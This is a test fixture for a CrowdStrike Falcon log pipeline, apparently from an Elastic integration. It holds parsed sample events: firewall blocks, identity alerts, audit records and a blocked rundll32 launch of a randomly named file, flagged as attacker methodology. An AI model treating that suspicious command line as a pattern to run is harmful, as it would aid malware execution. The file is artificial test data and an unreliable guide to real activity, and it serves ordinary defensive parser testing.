a/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log-expected.json b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log-expected.json new file mode 100644 index 00000000000..9bf6eef6340 --- /dev/null +++ b/packages/crowdstrike/data_stream/falcon/_dev/test/pipeline/test-event-stream.log-expected.json @@ -0,0 +1,774 @@ +{ + "expected": [ + { + "@timestamp": "2023-11-02T10:39:31.000Z", + "crowdstrike": { + "event": { + "CustomerId": "abcabcabc22222", + "DeviceId": "6734ff444f4456", + "Flags": { + "Audit": false, + "Log": true, + "Monitor": true + }, + "MatchCount": 1, + "MatchCountSinceLastReport": 1, + "NetworkProfile": "2", + "PolicyID": "3ec266b28bef471f9fd990e4f39ac829", + "PolicyName": "PROD-FW-Workstations-Office-20201001", + "Protocol": "6", + "RuleAction": "2", + "Timestamp": "2023-11-02T10:39:29Z" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "FirewallMatchEvent", + "offset": 8693900, + "version": "1.0" + } + }, + "destination": { + "ip": "81.2.69.142", + "port": 445 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "firewall_match_event" + ], + "category": [ + "network" + ], + "code": "FirewallRuleIP4Matched", + "created": "2023-11-02T10:39:31.000Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8693900,\"eventType\":\"FirewallMatchEvent\",\"eventCreationTime\":1698921571000,\"version\":\"1.0\"},\"event\":{\"DeviceId\":\"6734ff444f4456\",\"CustomerId\":\"abcabcabc22222\",\"Ipv\":\"ipv4\",\"CommandLine\":\"System\",\"ConnectionDirection\":\"1\",\"EventType\":\"FirewallRuleIP4Matched\",\"Flags\":{\"Audit\":false,\"Log\":true,\"Monitor\":true},\"HostName\":\"INPUNEDITCLP229\",\"ICMPCode\":\"\",\"ICMPType\":\"\",\"ImageFileName\":\"System\",\"LocalAddress\":\"81.2.69.142\",\"LocalPort\":\"445\",\"MatchCount\":1,\"MatchCountSinceLastReport\":1,\"NetworkProfile\":\"2\",\"PID\":\"11111111\",\"PolicyName\":\"PROD-FW-Workstations-Office-20201001\",\"PolicyID\":\"3ec266b28bef471f9fd990e4f39ac829\",\"Protocol\":\"6\",\"RemoteAddress\":\"81.2.69.142\",\"RemotePort\":\"53452\",\"RuleAction\":\"2\",\"RuleDescription\":\"\",\"RuleFamilyID\":\"11111111aaaaaaaa\",\"RuleGroupName\":\"SMBRules\",\"RuleName\":\"InboundSMBBlock\\u0026LogPrivate\",\"RuleId\":\"4877172638743447345\",\"Status\":\"\",\"Timestamp\":\"2023-11-02T10:39:29Z\",\"TreeID\":\"\",\"Platform\":\"windows\"}}", + "type": [ + "start", + "connection", + "denied" + ] + }, + "host": { + "name": "INPUNEDITCLP229", + "os": { + "platform": "windows" + } + }, + "message": "Firewall Rule: 'InboundSMBBlock&LogPrivate' triggered - Action: 'Blocked'", + "network": { + "direction": "ingress", + "type": "ipv4" + }, + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "process": { + "args": [ + "System" + ], + "command_line": "System", + "executable": "System", + "pid": 11111111 + }, + "related": { + "hosts": [ + "INPUNEDITCLP229" + ], + "ip": [ + "81.2.69.142" + ] + }, + "rule": { + "category": "11111111aaaaaaaa", + "id": "4877172638743447345", + "name": "InboundSMBBlock&LogPrivate", + "ruleset": "SMBRules" + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.142", + "port": 53452 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2023-11-02T10:40:07.000Z", + "crowdstrike": { + "event": { + "ActivityId": "76CC8396-7148-4CEB-84CB-08FAFE4FAC37", + "DataDomains": "Identity", + "Objective": "Gain Access", + "PatternId": "51135", + "SeverityName": "Low", + "SourceAccountUpn": "admin.service@example.com", + "SourceEndpointAccountObjectGuid": "C078A5DA-E13B-4418-AA28-802EF8C16210", + "SourceEndpointAccountObjectSid": "S-1-S-1-S-1-1111-1844237615-1801674531-316681", + "SourceEndpointSensorId": "a2f1de586958434eb5e14e30214e17ed", + "SourceProducts": "FalconIdentityProtection", + "SourceVendors": "CrowdStrike" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "IdpDetectionSummaryEvent", + "offset": 8693906, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ipd-detection", + "category": [ + "malware" + ], + "created": "2023-11-02T10:38:58.000Z", + "end": "2023-11-02T10:36:00.000Z", + "kind": "alert", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8693906,\"eventType\":\"IdpDetectionSummaryEvent\",\"eventCreationTime\":1698921607000,\"version\":\"1.0\"},\"event\":{\"ContextTimeStamp\":133433951380000000,\"DetectId\":\"abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222\",\"DetectName\":\"Unusual login to an endpoint\",\"DetectDescription\":\"A user logged into a machine for the first time\",\"FalconHostLink\":\"https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222?_cid=abcabcabc22222\",\"StartTime\":133433949600000000,\"EndTime\":133433949600000000,\"Severity\":34,\"SeverityName\":\"Low\",\"Tactic\":\"InitialAccess\",\"Technique\":\"ValidAccounts\",\"Objective\":\"Gain Access\",\"SourceAccountDomain\":\"NA.AAA.ABC.com\",\"SourceAccountName\":\"abc.service\",\"SourceAccountUpn\":\"admin.service@example.com\",\"SourceAccountObjectSid\":\"S-1-S-1-S-1-1111-1844237615-1801674531-175881\",\"SourceEndpointAccountObjectGuid\":\"C078A5DA-E13B-4418-AA28-802EF8C16210\",\"SourceEndpointAccountObjectSid\":\"S-1-S-1-S-1-1111-1844237615-1801674531-316681\",\"SourceEndpointHostName\":\"nope122.na.net.ABC.com\",\"SourceEndpointIpAddress\":\"81.2.69.142\",\"SourceEndpointSensorId\":\"a2f1de586958434eb5e14e30214e17ed\",\"ActivityId\":\"76CC8396-7148-4CEB-84CB-08FAFE4FAC37\",\"PatternId\":51135,\"SourceVendors\":\"CrowdStrike\",\"SourceProducts\":\"FalconIdentityProtection\",\"DataDomains\":\"Identity\"}}", + "reference": "https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222?_cid=abcabcabc22222", + "severity": 34, + "start": "2023-11-02T10:36:00.000Z", + "type": [ + "info" + ] + }, + "host": { + "ip": "81.2.69.142", + "name": "nope122.na.net.ABC.com" + }, + "message": "A user logged into a machine for the first time", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "hosts": [ + "nope122.na.net.ABC.com" + ], + "user": [ + "abc.service" + ] + }, + "rule": { + "description": "A user logged into a machine for the first time", + "id": "abcabcabc22222:ind:abcabcabc22222:5E8D397E-79C1-AAAA-9715-EEEEEE2222", + "name": "Unusual login to an endpoint", + "uuid": "51135" + }, + "tags": [ + "preserve_original_event" + ], + "threat": { + "tactic": { + "name": [ + "InitialAccess" + ] + }, + "technique": { + "name": [ + "ValidAccounts" + ] + } + }, + "user": { + "domain": "NA.AAA.ABC.com", + "id": "S-1-S-1-S-1-1111-1844237615-1801674531-175881", + "name": "abc.service" + } + }, + { + "@timestamp": "2023-11-02T11:09:00.000Z", + "crowdstrike": { + "event": { + "Category": "Detections", + "NumberOfCompromisedEntities": 2, + "NumbersOfAlerts": 1, + "SeverityName": "LOW", + "State": "NEW" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "IdentityProtectionEvent", + "offset": 8694126, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Unusuallogintoanendpoint", + "category": [ + "iam" + ], + "created": "2023-11-02T11:12:03.065Z", + "id": "7a79b2de-4e10-41fb-818f-2bdf53c1625a", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8694126,\"eventType\":\"IdentityProtectionEvent\",\"eventCreationTime\":1698923523065,\"version\":\"1.0\"},\"event\":{\"IncidentType\":\"Unusuallogintoanendpoint\",\"IncidentDescription\":\"Unusuallogintoanendpoint\",\"Severity\":4,\"SeverityName\":\"LOW\",\"StartTime\":1698923340000,\"EndTime\":1698923340000,\"IdentityProtectionIncidentId\":\"7a79b2de-4e10-41fb-818f-2bdf53c1625a\",\"UserName\":\"NA.NET.ABC.com\\\\abc.service\",\"EndpointName\":\"itreg1d3wp8vh3.eu.net.ABC.com\",\"EndpointIp\":\"\",\"Category\":\"Detections\",\"NumbersOfAlerts\":1,\"NumberOfCompromisedEntities\":2,\"State\":\"NEW\",\"FalconHostLink\":\"https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:7A79B2DE-4E10-41FB-818F-2BDF53C1625A\"}}", + "reference": "https://falcon.crowdstrike.com/identity-protection/detections/abcabcabc22222:ind:abcabcabc22222:7A79B2DE-4E10-41FB-818F-2BDF53C1625A", + "severity": 4, + "start": "2023-11-02T11:09:00.000Z", + "type": [ + "info" + ] + }, + "host": { + "hostname": "itreg1d3wp8vh3.eu.net.ABC.com" + }, + "message": "Unusuallogintoanendpoint", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "user": [ + "abc.service" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "NA.NET.ABC.com", + "name": "abc.service" + } + }, + { + "@timestamp": "2023-11-02T12:21:39.000Z", + "crowdstrike": { + "event": { + "Attributes": { + "actor_cid": "abcabcabc22222", + "actor_user": "admin.rose@example.com", + "actor_user_uuid": "00000000-aaaa-480b-a05a-bb94ff5dc0fb", + "app_id": "aaaaaaaa-2e60-4837-b987-c57020947cd6", + "saml_assertion": "saml_assertion_sample", + "target_user": "admin.rose@example.com", + "trace_id": "000000-76c5-4861-92f1-355d0a908f40" + }, + "AuditKeyValues": [ + { + "Key": "target_user", + "ValueString": "admin.rose@example.com" + }, + { + "Key": "trace_id", + "ValueString": "19169200-76c5-4861-92f1-355d0a908f40" + }, + { + "Key": "saml_envelope", + "ValueString": "SampleValue" + }, + { + "Key": "saml_assertion", + "ValueString": "sampleassertion" + }, + { + "Key": "app_id", + "ValueString": "fa8e047e-2e60-4837-b987-c57020947cd6" + }, + { + "Key": "actor_user", + "ValueString": "admin.rose@example.com" + }, + { + "Key": "actor_user_uuid", + "ValueString": "8940ddf0-bc3c-480b-a05a-bb94ff5dc0fb" + }, + { + "Key": "actor_cid", + "ValueString": "abcabcabc22222" + } + ], + "OperationName": "saml2Assert", + "Success": true + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "AuthActivityAuditEvent", + "offset": 8694676, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "saml2Assert" + ], + "category": [ + "iam" + ], + "created": "2023-11-02T12:21:39.286Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8694676,\"eventType\":\"AuthActivityAuditEvent\",\"eventCreationTime\":1698927699286,\"version\":\"1.0\"},\"event\":{\"UserId\":\"admin.rose@example.com\",\"UserIp\":\"81.2.69.144\",\"OperationName\":\"saml2Assert\",\"ServiceName\":\"CrowdstrikeAuthentication\",\"Success\":true,\"UTCTimestamp\":1698927699,\"AuditKeyValues\":[{\"Key\":\"target_user\",\"ValueString\":\"admin.rose@example.com\"},{\"Key\":\"trace_id\",\"ValueString\":\"19169200-76c5-4861-92f1-355d0a908f40\"},{\"Key\":\"saml_envelope\",\"ValueString\":\"SampleValue\"},{\"Key\":\"saml_assertion\",\"ValueString\":\"sampleassertion\"},{\"Key\":\"app_id\",\"ValueString\":\"fa8e047e-2e60-4837-b987-c57020947cd6\"},{\"Key\":\"actor_user\",\"ValueString\":\"admin.rose@example.com\"},{\"Key\":\"actor_user_uuid\",\"ValueString\":\"8940ddf0-bc3c-480b-a05a-bb94ff5dc0fb\"},{\"Key\":\"actor_cid\",\"ValueString\":\"abcabcabc22222\"}],\"Attributes\":{\"actor_cid\":\"abcabcabc22222\",\"actor_user\":\"admin.rose@example.com\",\"actor_user_uuid\":\"00000000-aaaa-480b-a05a-bb94ff5dc0fb\",\"app_id\":\"aaaaaaaa-2e60-4837-b987-c57020947cd6\",\"saml_assertion\":\"saml_assertion_sample\",\"target_user\":\"admin.rose@example.com\",\"trace_id\":\"000000-76c5-4861-92f1-355d0a908f40\"}}}", + "outcome": "success" + }, + "message": "CrowdstrikeAuthentication", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "admin.rose@example.com" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "admin.rose@example.com", + "name": "admin.rose@example.com" + } + }, + { + "@timestamp": "2023-11-02T12:28:47.000Z", + "crowdstrike": { + "event": { + "Attributes": { + "device_id": "afjafanfafasfjaf", + "message": "Removeduplicatesensor.", + "seedID": "101" + }, + "AuditKeyValues": [ + { + "Key": "device_id", + "ValueString": "abcancancbanjjagjaj" + }, + { + "Key": "seedID", + "ValueString": "101" + }, + { + "Key": "message", + "ValueString": "Removeduplicatesensor." + } + ], + "ServiceName": "sensor_update_policy" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "UserActivityAuditEvent", + "offset": 8694733, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "user_activity_audit_event", + "category": [ + "iam" + ], + "created": "2023-11-02T12:28:47.000Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8694733,\"eventType\":\"UserActivityAuditEvent\",\"eventCreationTime\":1698928127000,\"version\":\"1.0\"},\"event\":{\"UserId\":\"admin.rose@example.com\",\"UserIp\":\"81.2.69.144\",\"OperationName\":\"reveal_token\",\"ServiceName\":\"sensor_update_policy\",\"AuditKeyValues\":[{\"Key\":\"device_id\",\"ValueString\":\"abcancancbanjjagjaj\"},{\"Key\":\"seedID\",\"ValueString\":\"101\"},{\"Key\":\"message\",\"ValueString\":\"Removeduplicatesensor.\"}],\"UTCTimestamp\":1698928127,\"Attributes\":{\"device_id\":\"afjafanfafasfjaf\",\"message\":\"Removeduplicatesensor.\",\"seedID\":\"101\"}}}", + "type": [ + "change" + ] + }, + "message": "reveal_token", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "ip": [ + "81.2.69.144" + ], + "user": [ + "admin.rose@example.com" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "admin.rose@example.com", + "name": "admin.rose@example.com" + } + }, + { + "@timestamp": "2023-11-02T13:00:00.000Z", + "crowdstrike": { + "event": { + "ExecutionID": "efghtigh", + "ExecutionMetadata": { + "ExecutionDuration": 152176, + "ExecutionStart": 1698930019000, + "ReportFileName": "Laroux_Search_2023_November_2_13017_34176.csv", + "ResultCount": 0, + "ResultID": "fffffzdlIiwiY3VzdG9tZXJfYXBwIjoiZWFtIiwic2lnbmF0dXJlX3BvcnRpb24iOiIzYWRhOTZiNDA4MTkxNTFhZmIxYjFkOTM2MWZhMmE1NjBmNGNkMzc0ODQxNTY4MDlkYzhmNDRkMmRkZDY1NzdlIn0=", + "SearchWindowEnd": 1698930000000, + "SearchWindowStart": 1698843600000 + }, + "ReportFileReference": "/reports/entities/report-executions-download/v1?ids=eeeeeeeeeerrrrr444444", + "ReportID": "999999ddddddddd", + "ReportName": "LarouxSearch", + "ReportType": "event_search", + "Status": "1", + "StatusMessage": "message", + "UserUUID": "9999999-bc3c-99bb-a05a-bb94ff5dc0fb" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "ScheduledReportNotificationEvent", + "offset": 8694992, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "created": "2023-11-02T13:02:52.000Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8694992,\"eventType\":\"ScheduledReportNotificationEvent\",\"eventCreationTime\":1698930172000,\"version\":\"1.0\"},\"event\":{\"UserUUID\":\"9999999-bc3c-99bb-a05a-bb94ff5dc0fb\",\"UserID\":\"admin.rose@example.com\",\"ExecutionID\":\"efghtigh\",\"ReportID\":\"999999ddddddddd\",\"ReportName\":\"LarouxSearch\",\"ReportType\":\"event_search\",\"ReportFileReference\":\"/reports/entities/report-executions-download/v1?ids=eeeeeeeeeerrrrr444444\",\"Status\":1,\"StatusMessage\":\"message\",\"ExecutionMetadata\":{\"ExecutionStart\":1698930019000,\"ExecutionDuration\":152176,\"ReportFileName\":\"Laroux_Search_2023_November_2_13017_34176.csv\",\"ResultCount\":0,\"ResultID\":\"fffffzdlIiwiY3VzdG9tZXJfYXBwIjoiZWFtIiwic2lnbmF0dXJlX3BvcnRpb24iOiIzYWRhOTZiNDA4MTkxNTFhZmIxYjFkOTM2MWZhMmE1NjBmNGNkMzc0ODQxNTY4MDlkYzhmNDRkMmRkZDY1NzdlIn0=\",\"SearchWindowStart\":1698843600000,\"SearchWindowEnd\":1698930000000}}}" + }, + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "user": [ + "admin.rose" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "domain": "example.com", + "id": "admin.rose@example.com", + "name": "admin.rose" + } + }, + { + "@timestamp": "2023-11-02T13:41:34.000Z", + "crowdstrike": { + "event": { + "AgentIdString": "fffffffff33333", + "SessionId": "1111-fffff-4bb4-99c1-74c13cfc3e5a" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "RemoteResponseSessionStartEvent", + "offset": 8695284, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "remote_response_session_start_event" + ], + "category": [ + "network", + "session" + ], + "created": "2023-11-02T13:41:34.000Z", + "kind": "event", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8695284,\"eventType\":\"RemoteResponseSessionStartEvent\",\"eventCreationTime\":1698932494000,\"version\":\"1.0\"},\"event\":{\"SessionId\":\"1111-fffff-4bb4-99c1-74c13cfc3e5a\",\"HostnameField\":\"UKCHUDL00206\",\"UserName\":\"admin.rose@example.com\",\"StartTimestamp\":1698932494,\"AgentIdString\":\"fffffffff33333\"}}", + "start": "2023-11-02T13:41:34.000Z", + "type": [ + "start" + ] + }, + "host": { + "name": "UKCHUDL00206" + }, + "message": "Remote response session started.", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "related": { + "hosts": [ + "UKCHUDL00206" + ], + "user": [ + "admin.rose@example.com" + ] + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "email": "admin.rose@example.com", + "name": "admin.rose@example.com" + } + }, + { + "@timestamp": "2023-11-02T13:43:35.000Z", + "crowdstrike": { + "event": { + "AssociatedFile": "\\Device\\HarddiskVolume4\\Windows\\System32\\rundll32.exe", + "GrandparentCommandLine": "C:\\Windows\\system32\\userinit.exe", + "GrandparentImageFileName": "\\Device\\HarddiskVolume4\\Windows\\System32\\userinit.exe", + "HostGroups": [ + "e2091491a28248eaae3ede9f217e03fc", + "e837d750b8ba400c953380da346e2b04", + "186c20383a98495cb0e0a7d5540f3aff", + "24d1f760fcdc46d992bb8f41d7dd897b", + "2b7bd0fede874baaa1afdea20f255632", + "a293aded9c4548469d0e853b7267cce5", + "adab9db4541040729e01d16211189a27", + "b75b27ce17244922bd0a862a712ea812" + ], + "IOCType": "hash_sha256", + "IOCValue": "d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e", + "MACAddress": "02-50-41-00-00-01", + "Objective": "KeepAccess", + "ParentImageFileName": "\\Device\\HarddiskVolume4\\Windows\\explorer.exe", + "PatternDispositionFlags": { + "BlockingUnsupportedOrDisabled": false, + "BootupSafeguardEnabled": false, + "CriticalProcessDisabled": false, + "Detect": false, + "FsOperationBlocked": false, + "HandleOperationDowngraded": false, + "InddetMask": false, + "Indicator": false, + "KillActionFailed": false, + "KillParent": false, + "KillProcess": false, + "KillSubProcess": false, + "OperationBlocked": false, + "PolicyDisabled": false, + "ProcessBlocked": true, + "QuarantineFile": false, + "QuarantineMachine": false, + "RegistryOperationBlocked": false, + "Rooting": false, + "SensorOnly": false, + "SuspendParent": false, + "SuspendProcess": false + }, + "PatternDispositionValue": 2048, + "PatternId": "10186", + "SensorId": "69027ffffffffffffaaf50", + "SeverityName": "High" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "DetectionSummaryEvent", + "offset": 8695332, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Prevention,processwasblockedfromexecution.", + "category": [ + "malware" + ], + "created": "2023-11-02T13:43:35.000Z", + "kind": "alert", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8695332,\"eventType\":\"DetectionSummaryEvent\",\"eventCreationTime\":1698932615000,\"version\":\"1.0\"},\"event\":{\"ProcessStartTime\":1698932614,\"ProcessEndTime\":1698932614,\"ProcessId\":54665651,\"ParentProcessId\":540396081,\"ComputerName\":\"INNOIDL0032\",\"UserName\":\"vishnu.sharma\",\"DetectName\":\"AttackerMethodology\",\"DetectDescription\":\"Rundll32launchedafilewithanunusualname.Somemalwareabusesrundll32tolaunchmaliciouspayloads.Investigatethecommandlinearguments,astheylikelyreferencethemaliciouspayload.\",\"Severity\":4,\"SeverityName\":\"High\",\"FileName\":\"rundll32.exe\",\"FilePath\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\System32\",\"CommandLine\":\"\\\"C:\\\\Windows\\\\System32\\\\rundll32.exe\\\"\\\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh\",\"SHA256String\":\"d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e\",\"MD5String\":\"a52bfa4a96f97c368312028dbd7c8461\",\"SHA1String\":\"0000000000000000000000000000000000000000\",\"MachineDomain\":\"AP\",\"FalconHostLink\":\"https://falcon.crowdstrike.com/activity/detections/detail/6902738b2a374a718cd9a45085baaf50/2246270721205?_cid=gffffffffy3zjobdz7ewb4xjqyjsy5a\",\"SensorId\":\"69027ffffffffffffaaf50\",\"IOCType\":\"hash_sha256\",\"IOCValue\":\"d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e\",\"DetectId\":\"ldt:690ddddddd0721205\",\"LocalIP\":\"81.2.69.144\",\"MACAddress\":\"02-50-41-00-00-01\",\"Tactic\":\"DefenseEvasion\",\"Technique\":\"Rundll32\",\"Objective\":\"KeepAccess\",\"PatternDispositionDescription\":\"Prevention,processwasblockedfromexecution.\",\"PatternDispositionValue\":2048,\"PatternDispositionFlags\":{\"Indicator\":false,\"Detect\":false,\"InddetMask\":false,\"SensorOnly\":false,\"Rooting\":false,\"KillProcess\":false,\"KillSubProcess\":false,\"QuarantineMachine\":false,\"QuarantineFile\":false,\"PolicyDisabled\":false,\"KillParent\":false,\"OperationBlocked\":false,\"ProcessBlocked\":true,\"RegistryOperationBlocked\":false,\"CriticalProcessDisabled\":false,\"BootupSafeguardEnabled\":false,\"FsOperationBlocked\":false,\"HandleOperationDowngraded\":false,\"KillActionFailed\":false,\"BlockingUnsupportedOrDisabled\":false,\"SuspendProcess\":false,\"SuspendParent\":false},\"ParentImageFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\explorer.exe\",\"ParentCommandLine\":\"C:\\\\Windows\\\\Explorer.EXE\",\"GrandparentImageFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\System32\\\\userinit.exe\",\"GrandparentCommandLine\":\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"HostGroups\":\"e2091491a28248eaae3ede9f217e03fc,e837d750b8ba400c953380da346e2b04,186c20383a98495cb0e0a7d5540f3aff,24d1f760fcdc46d992bb8f41d7dd897b,2b7bd0fede874baaa1afdea20f255632,a293aded9c4548469d0e853b7267cce5,adab9db4541040729e01d16211189a27,b75b27ce17244922bd0a862a712ea812\",\"Tags\":\"SensorGroupingTags/USB_Storage_Exception\",\"AssociatedFile\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\System32\\\\rundll32.exe\",\"PatternId\":10186}}", + "reference": "https://falcon.crowdstrike.com/activity/detections/detail/6902738b2a374a718cd9a45085baaf50/2246270721205?_cid=gffffffffy3zjobdz7ewb4xjqyjsy5a", + "severity": 4, + "type": [ + "info" + ] + }, + "file": { + "hash": { + "md5": "a52bfa4a96f97c368312028dbd7c8461", + "sha1": "0000000000000000000000000000000000000000", + "sha256": "d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e" + }, + "path": "\\Device\\HarddiskVolume4\\Windows\\System32" + }, + "host": { + "domain": "AP", + "name": "INNOIDL0032" + }, + "message": "Rundll32launchedafilewithanunusualname.Somemalwareabusesrundll32tolaunchmaliciouspayloads.Investigatethecommandlinearguments,astheylikelyreferencethemaliciouspayload.", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "process": { + "args": [ + "\"C:\\Windows\\System32\\rundll32.exe\"\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh" + ], + "command_line": "\"C:\\Windows\\System32\\rundll32.exe\"\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh", + "end": "2023-11-02T13:43:34.000Z", + "executable": "\"C:\\Windows\\System32\\rundll32.exe\"\\lwbuimisawnmsfdjmazvobzb.brl,kokknnjfybyqjrrh", + "name": "rundll32.exe", + "parent": { + "args": [ + "C:\\Windows\\Explorer.EXE" + ], + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\Explorer.EXE", + "pid": 540396081 + }, + "pid": 54665651, + "start": "2023-11-02T13:43:34.000Z" + }, + "related": { + "hash": [ + "0000000000000000000000000000000000000000", + "d64d27be4c907b0a2a0c32e1b1a4a44a1333a936fe63127d69df41c859da8c9e", + "a52bfa4a96f97c368312028dbd7c8461" + ], + "hosts": [ + "INNOIDL0032" + ], + "ip": [ + "81.2.69.144" + ], + "user": [ + "vishnu.sharma" + ] + }, + "rule": { + "description": "Rundll32launchedafilewithanunusualname.Somemalwareabusesrundll32tolaunchmaliciouspayloads.Investigatethecommandlinearguments,astheylikelyreferencethemaliciouspayload.", + "id": "ldt:690ddddddd0721205", + "name": "AttackerMethodology" + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "tags": [ + "preserve_original_event", + "SensorGroupingTags/USB_Storage_Exception" + ], + "threat": { + "framework": "MITRE ATT&CK", + "tactic": { + "name": [ + "DefenseEvasion" + ] + }, + "technique": { + "name": [ + "Rundll32" + ] + } + }, + "user": { + "name": "vishnu.sharma" + } + }, + { + "@timestamp": "2023-11-03T00:36:37.000Z", + "crowdstrike": { + "event": { + "FineScore": 6.1, + "IncidentType": "1", + "State": "open" + }, + "metadata": { + "customerIDString": "abcabcabc22222", + "eventType": "IncidentSummaryEvent", + "offset": 8698239, + "version": "1.0" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "incident" + ], + "category": [ + "malware" + ], + "created": "2023-11-03T00:36:37.000Z", + "end": "2023-11-03T00:36:37.000Z", + "id": "inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e", + "kind": "alert", + "original": "{\"metadata\":{\"customerIDString\":\"abcabcabc22222\",\"offset\":8698239,\"eventType\":\"IncidentSummaryEvent\",\"eventCreationTime\":1698971797000,\"version\":\"1.0\"},\"event\":{\"IncidentStartTime\":1698971797,\"IncidentEndTime\":1698971797,\"FalconHostLink\":\"https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e?_cid=ggggffffhhhhjjjjj\",\"State\":\"open\",\"FineScore\":6.1,\"LateralMovement\":0,\"IncidentType\":1,\"IncidentID\":\"inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e\",\"HostID\":\"4345454534534545\"}}", + "reference": "https://falcon.crowdstrike.com/crowdscore/incidents/details/inc:654a735066d640939aaaaaaaaaaaaaaaaaaaaaaaf47349032acd86820223e?_cid=ggggffffhhhhjjjjj", + "start": "2023-11-03T00:36:37.000Z", + "type": [ + "info" + ] + }, + "host": { + "id": "4345454534534545" + }, + "message": "Incident score 6.1", + "observer": { + "product": "Falcon", + "vendor": "Crowdstrike" + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git 